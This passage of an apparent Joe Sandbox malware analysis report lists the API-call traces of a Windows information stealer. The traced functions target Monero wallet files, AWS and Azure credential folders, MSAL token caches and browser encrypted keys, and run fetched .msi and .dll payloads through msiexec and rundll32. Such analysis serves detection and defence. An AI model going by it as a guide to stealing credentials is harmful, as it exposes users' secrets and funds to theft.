                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015BCF28,00000000,?,009B144C,00000000,?,?), ref: 0099CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0099CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0099CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0099CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099CAD9
                        • StrStrA.SHLWAPI(?,015BCE80,009B0B52), ref: 0099CAF7
                        • StrStrA.SHLWAPI(00000000,015BCDF0), ref: 0099CB1E
                        • StrStrA.SHLWAPI(?,015BD338,00000000,?,009B1458,00000000,?,00000000,00000000,?,015B8B70,00000000,?,009B1454,00000000,?), ref: 0099CCA2
                        • StrStrA.SHLWAPI(00000000,015BD098), ref: 0099CCB9
                          • Part of subcall function 0099C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0099C871
                          • Part of subcall function 0099C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0099C87C
                        • StrStrA.SHLWAPI(?,015BD098,00000000,?,009B145C,00000000,?,00000000,015B8A60), ref: 0099CD5A
                        • StrStrA.SHLWAPI(00000000,015B88D0), ref: 0099CD71
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B46), ref: 0099C943
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B47), ref: 0099C957
                          • Part of subcall function 0099C820: lstrcat.KERNEL32(?,009B0B4E), ref: 0099C978
                        • lstrlen.KERNEL32(00000000), ref: 0099CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0099CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: b91760d569cd6cf2a514984333580488a3910222cb98926bfdbc3608b0311ac3
                        • Instruction ID: 684139d8e04e711b737d4aee8fd8cdac5df7cff456a8da2b12c815b3da28f69b
                        • Opcode Fuzzy Hash: b91760d569cd6cf2a514984333580488a3910222cb98926bfdbc3608b0311ac3
                        • Instruction Fuzzy Hash: B7E1FA71900108AFDB54EBA4DCA6FEEB778AF95300F404159F107A7191EF346A4ACBA6
                        Function 009A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • RegOpenKeyExA.ADVAPI32(00000000,015BAAC0,00000000,00020019,00000000,009B05B6), ref: 009A83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009A8426
                        • wsprintfA.USER32 ref: 009A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8499
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 1815a9eeaac0e71c5a72b702c50dc7760b66e624e09ec19241aeb264eb4f130e
                        • Instruction ID: c9f31ba68439daa025c35766cb4ef33895220ebaf27ca4b121ce95e9de4f2d99
                        • Opcode Fuzzy Hash: 1815a9eeaac0e71c5a72b702c50dc7760b66e624e09ec19241aeb264eb4f130e
                        • Instruction Fuzzy Hash: AA813B71911118ABEB68DB54CC95FEAB7B8BF48700F008299E10AA6180DF756B85CFD1
                        Function 009A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 009A4DCD
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A492C
                          • Part of subcall function 009A4910: FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 009A4E59
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                          • Part of subcall function 009A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                          • Part of subcall function 009A4910: FindClose.KERNEL32(000000FF), ref: 009A4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 009A4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009A4EE5
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A49B0
                          • Part of subcall function 009A4910: StrCmpCA.SHLWAPI(?,009B08D2), ref: 009A49C5
                          • Part of subcall function 009A4910: wsprintfA.USER32 ref: 009A49E2
                          • Part of subcall function 009A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009A4A1E
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,015BE390), ref: 009A4A4A
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,009B0FF8), ref: 009A4A5C
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,?), ref: 009A4A70
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,009B0FFC), ref: 009A4A82
                          • Part of subcall function 009A4910: lstrcat.KERNEL32(?,?), ref: 009A4A96
                          • Part of subcall function 009A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009A4AAC
                          • Part of subcall function 009A4910: DeleteFileA.KERNEL32(?), ref: 009A4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 835874f04435ddcbdc031a1984402eba16e4efe71a6435c312159a6f1b421bd3
                        • Instruction ID: 6397b3f36ea4104683d5a1c41222c8531a7eb5edd20d48bbc094627edb9c2269
                        • Opcode Fuzzy Hash: 835874f04435ddcbdc031a1984402eba16e4efe71a6435c312159a6f1b421bd3
                        • Instruction Fuzzy Hash: 114181BA94020867CB50F770ED57FEE7338ABA5704F404494B689660C1FEB56BC9CB92
                        Function 009A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009A906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 3ef6a4b666f9f6bd603090bde39a51d131875bbd04920ae52a38ec5ce2647195
                        • Instruction ID: 355323d915f12616b689a1d80357900074609042d3b6b449000e4d4f99604b03
                        • Opcode Fuzzy Hash: 3ef6a4b666f9f6bd603090bde39a51d131875bbd04920ae52a38ec5ce2647195
                        • Instruction Fuzzy Hash: 3971EC71A10208ABDB04DFE4DD99FEEB7B8BF88700F108509F515A7290EF35A905CB61
                        Function 009A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 009A34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 58af376534b148e090dc416a0766ecf740f563d9b290dd3a79de2a69e3342d9a
                        • Instruction ID: 562d8670e1211747bc6760f7753be7ca5e42c84e9847cfacfdc82c2012944200
                        • Opcode Fuzzy Hash: 58af376534b148e090dc416a0766ecf740f563d9b290dd3a79de2a69e3342d9a
                        • Instruction Fuzzy Hash: DC1219718001089BDB49EBA4DC92FEEB778AF95300F508169F50766091EF346B4ACFE6
                        Function 009A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 00996280: InternetOpenA.WININET(009B0DFE,00000001,00000000,00000000,00000000), ref: 009962E1
                          • Part of subcall function 00996280: StrCmpCA.SHLWAPI(?,015BE270), ref: 00996303
                          • Part of subcall function 00996280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00996335
                          • Part of subcall function 00996280: HttpOpenRequestA.WININET(00000000,GET,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00996385
                          • Part of subcall function 00996280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009963BF
                          • Part of subcall function 00996280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009963D1
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009A5318
                        • lstrlen.KERNEL32(00000000), ref: 009A532F
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 009A5364
                        • lstrlen.KERNEL32(00000000), ref: 009A5383
                        • lstrlen.KERNEL32(00000000), ref: 009A53AE
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 1e769a1cfd90736ea31772a7dd817367f06a30a23491a531c6aa705152861456
                        • Instruction ID: 780edb71ac6f8e603609444cce363244e50e6569912e1f48c068006a06181cb3
                        • Opcode Fuzzy Hash: 1e769a1cfd90736ea31772a7dd817367f06a30a23491a531c6aa705152861456
                        • Instruction Fuzzy Hash: DC51FA309101489BCB58FF64CD96BEE7779AF92301F504018F8065B5A2EF386B46CBE2
                        Function 009A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 7c659731375e75d0f841b2c699588ba648795eb806bd44de13149aa9e428fab6
                        • Instruction ID: 09262ba1d5d70a8e2b3be428e9b8ec339a2ce7c0007e57102b5fbd3daa9e499c
                        • Opcode Fuzzy Hash: 7c659731375e75d0f841b2c699588ba648795eb806bd44de13149aa9e428fab6
                        • Instruction Fuzzy Hash: 73C190B59012199BCB14EF60DC99FEE7378BBA4304F004599F50AA7281EF74AA85CFD1
                        Function 009A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 009A42EC
                        • lstrcat.KERNEL32(?,015BDBD8), ref: 009A430B
                        • lstrcat.KERNEL32(?,?), ref: 009A431F
                        • lstrcat.KERNEL32(?,015BCE98), ref: 009A4333
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8D90: GetFileAttributesA.KERNEL32(00000000,?,00991B54,?,?,009B564C,?,?,009B0E1F), ref: 009A8D9F
                          • Part of subcall function 00999CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00999D39
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A93C0: GlobalAlloc.KERNEL32(00000000,009A43DD,009A43DD), ref: 009A93D3
                        • StrStrA.SHLWAPI(?,015BDB90), ref: 009A43F3
                        • GlobalFree.KERNEL32(?), ref: 009A4512
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999AEF
                          • Part of subcall function 00999AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00994EEE,00000000,?), ref: 00999B01
                          • Part of subcall function 00999AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00994EEE,00000000,00000000), ref: 00999B2A
                          • Part of subcall function 00999AC0: LocalFree.KERNEL32(?,?,?,?,00994EEE,00000000,?), ref: 00999B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 009A44A3
                        • StrCmpCA.SHLWAPI(?,009B08D1), ref: 009A44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009A44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 009A44E5
                        • lstrcat.KERNEL32(00000000,009B0FB8), ref: 009A44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: 3dabcad6821ddbecc949fbef30d8f77dde8ffb713ec70687776f9c35c503dac6
                        • Instruction ID: aab1e6099fb4dbb93745fd1d8edd98f997e23c4e061efbf0045dcfa18dfb3bd5
                        • Opcode Fuzzy Hash: 3dabcad6821ddbecc949fbef30d8f77dde8ffb713ec70687776f9c35c503dac6
                        • Instruction Fuzzy Hash: 297143B6D00208ABCB14EBA4DC95FEE737DABC9300F044599F605A7181EE75EB45CB91
                        Function 00991310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009912B4
                          • Part of subcall function 009912A0: RtlAllocateHeap.NTDLL(00000000), ref: 009912BB
